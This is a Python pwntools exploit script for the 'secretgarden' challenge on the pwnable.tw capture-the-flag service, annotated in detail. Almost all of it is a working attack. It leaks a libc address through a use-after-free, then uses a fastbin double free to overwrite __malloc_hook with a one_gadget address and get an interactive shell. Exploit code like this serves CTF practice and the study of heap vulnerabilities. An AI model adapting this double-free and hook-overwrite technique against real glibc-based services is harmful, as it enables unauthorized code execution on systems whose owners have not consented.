import sys
import time

from pwn import *
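# Environment for the local target: the bundled libc is LD_PRELOADed so the
# local heap/libc layout matches the remote service. Every hard-coded offset
# in this script (leak offset, one_gadget, __malloc_hook) belongs to this
# specific build of libc_64.so.6 and must be recomputed for any other libc.
env = {
    "LD_PRELOAD": "./libc_64.so.6",
}
# Parsed copy of the same libc; main() rebases it (glibc.address) once the
# leak is known, so glibc.symbols[...] then yield runtime addresses.
glibc = ELF("./libc_64.so.6")
# The target is x86-64: the libc is the 64-bit build, the script packs and
# unpacks with p64/u64 only, and the gdb breakpoints are rebased onto the
# x86-64 no-ASLR PIE base. The original declared arch='i386', which only
# affected pwntools defaults (pack/unpack width, asm, gdb setup) and not the
# explicit p64/u64 calls; amd64 is the consistent value.
context(os='linux', arch='amd64', log_level='debug')
# Set to 1 to attach gdb to the local process with the breakpoints below.
GDB = 0
# PIE-relative breakpoint offsets for createGDBScript(listBp, pie=True).
listBp = [
    #0xE74,
    #0xF7A,
    0xCD8,
]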
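def createGDBScript(listBp, pie=False, base=0x555555554000):
    """Build a gdb script that breaks at each given address and continues.

    Args:
        listBp: iterable of breakpoint addresses. They are file offsets when
            ``pie`` is true and absolute addresses otherwise.
        pie: when true, every entry of ``listBp`` is rebased onto ``base``.
        base: load address added to each offset when ``pie`` is true. The
            default is the address Linux maps a PIE x86-64 binary at when
            ASLR is disabled, which matches ``process(..., aslr=False)``;
            pass the real base for an ASLR-enabled run.

    Returns:
        The script text: one ``b * 0x...`` line per breakpoint, then ``c``
        so the target resumes after attach. An empty ``listBp`` yields
        just ``"c\\n"``.
    """
    offset = base if pie else 0
    lines = ["b * " + hex(a + offset) for a in listBp]
    lines.append("c")
    return "\n".join(lines) + "\n"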
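# Choose the target: any command-line argument selects the remote CTF
# service, otherwise a local copy of the binary is started with the bundled
# libc preloaded. `flag` only records the choice (1 = remote, 0 = local).
if len(sys.argv) > 1:
    flag = 1
    r = remote("chall.pwnable.tw", 10203)
else:
    flag = 0
    # ASLR is disabled locally so the PIE base is the fixed address that the
    # gdb breakpoint offsets are rebased onto. The exploit path in main()
    # itself only uses libc addresses derived from the leak, so this does not
    # affect whether the attack works remotely.
    r = process("./secretgarden", aslr=False, env=env)

    # The original left gdb.attach at the same indentation as the `if`,
    # which is an IndentationError at import time; it belongs inside the
    # GDB guard so a plain run does not try to attach a debugger.
    if GDB:
        gdb.attach(r, gdbscript=createGDBScript(listBp, pie=True))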
def add(length, name, color):
    """Drive menu option 1 on the global connection ``r``.

    The prompts suggest this adds a flower with the given name length, name
    and color. ``length`` and ``color`` are sent line-terminated after their
    prompts; ``name`` is sent raw (no trailing newline) so the binary
    ``p64`` payloads main() passes as names reach the target unaltered.
    Nothing is returned and no response is read back; the caller keeps track
    of which slot the flower lands in.
    """
    conn = r
    conn.sendline("1")
    conn.sendlineafter("Length of the name :", str(length))
    # raw send: no newline must be appended to a binary name
    conn.sendafter("The name of flower :", name)
    conn.sendlineafter("The color of the flower :", color)
def remove(index):
    """Drive menu option 3 on the global connection ``r`` for slot ``index``.

    The prompt text indicates this removes a flower from the garden. The
    slot is sent as its decimal string after the prompt; nothing is returned
    and the target's answer is not read, so a bad index is only visible in
    the debug log.
    """
    prompt = "Which flower do you want to remove from the garden:"
    r.sendline("3")
    r.sendlineafter(prompt, "{}".format(index))
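def main():
    """Run the two-stage attack over the global connection ``r``.

    Stage 1 (libc leak): two 0x100-byte flowers are added, the first is
    freed, and a 0xc8-byte flower with the one-byte name "x" is carved out
    of the freed chunk (the original's "first fit" note). Listing the garden
    (menu option 2) then prints the stale heap pointer that follows that
    byte as flower[2]'s name; subtracting the fixed offset 0x3c3c78 gives
    the libc base.

    Stage 2 (fastbin double free): three 0x60-byte flowers are freed in the
    order 0, 1, 0, the chunk that comes back from malloc gets its fd
    overwritten with ``__malloc_hook - 0x23`` (a standard spot where an
    existing libc byte passes fastbin's size check), and the fourth
    allocation lands on that fake chunk so the hook can be overwritten with
    a one_gadget address. The two trailing remove(0) calls are what the
    script relies on to reach the hook; the original does not document the
    mechanism (free's error path allocating is the usual one) -- confirm
    against this libc.

    Every offset here (0x3c3c78, 0xef6c4, 0x23, 0x13) is specific to the
    bundled ./libc_64.so.6. The leak is sanity-checked before use: a wrong
    leak would otherwise become a blind write to an arbitrary address.

    Raises:
        RuntimeError: if the leaked libc base is not page aligned.
    """
    #First Fit Behavior
    add(0x100, "AAAAAAAA", "aaaaaaaa")
    add(0x100, "BBBBBBBB", "bbbbbbbb")
    remove(0)
    #Free First
    #Malloc now get the pointer of first
    # "x" is 0x78, the same low byte as the 0x3c3c78 offset subtracted below,
    # which is presumably why the one-byte name leaves the leaked pointer
    # intact.
    add(0xc8, "x", "cccccccc")
    r.sendline("2")

    #0x155555328b20<----Leak
    #0x155554f65000<----Base
    r.recvuntil("Name of the flower[2] :")
    # NOTE: written against Python 2 str semantics; on Python 3 pwntools
    # returns bytes and the pad would have to be b'\x00'.
    leaked = u64(r.recvuntil("\n")[:-1].ljust(8, '\x00'))
    libc = leaked - 0x3c3c78
    # A libc base is always page aligned; anything else means the leak was
    # mis-parsed (different libc build, extra output, short read). Stop here
    # rather than feed a bogus target into the fastbin attack below.
    if libc & 0xfff:
        raise RuntimeError("implausible libc leak %#x (base %#x)" % (leaked, libc))
    glibc.address = libc
    log.success("libc: " + hex(libc))
    log.success("malloc_hook: " + hex(glibc.symbols['__malloc_hook']))
    remove(1)
    remove(2)
    # one_gadget offset for this libc build only; recompute for any other.
    one_gadget = glibc.address + 0xef6c4
    # Menu options 4 and 2 are sent blind and their output discarded; the
    # original does not say what 4 does (likely resetting the garden --
    # confirm against the binary).
    r.sendline("4")
    r.recv()
    r.sendline("2")
    r.recv()
    #raw_input()
    #fastbin double free

    add(0x60, "1" * 0x60, "0")
    add(0x60, "2" * 0x60, "1")
    remove(0)
    remove(1)
    remove(0)
    # This allocation returns the doubly freed chunk; its name (the chunk's
    # fd) now points 0x23 before __malloc_hook.
    add(0x60, p64(glibc.symbols['__malloc_hook'] - 0x23), "2")
    add(0x60, "3" * 0x60, "3")
    add(0x60, "4" * 0x60, "4")
    #gdb.attach(r)
    # Fourth allocation is the fake chunk: 0x13 bytes of padding cover the
    # distance from its data start to the hook (0x23 minus the 0x10 header),
    # then the hook itself receives the gadget address.
    add(0x60, "A" * 0x13 + p64(one_gadget), '5')

    remove(0)
    remove(0)
    r.interactive()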
# Only launch the exploit when run as a script; importing the module still
# opens the connection (see the top-level remote/process selection) but
# does not drive the attack.
if __name__ == "__main__":
    main()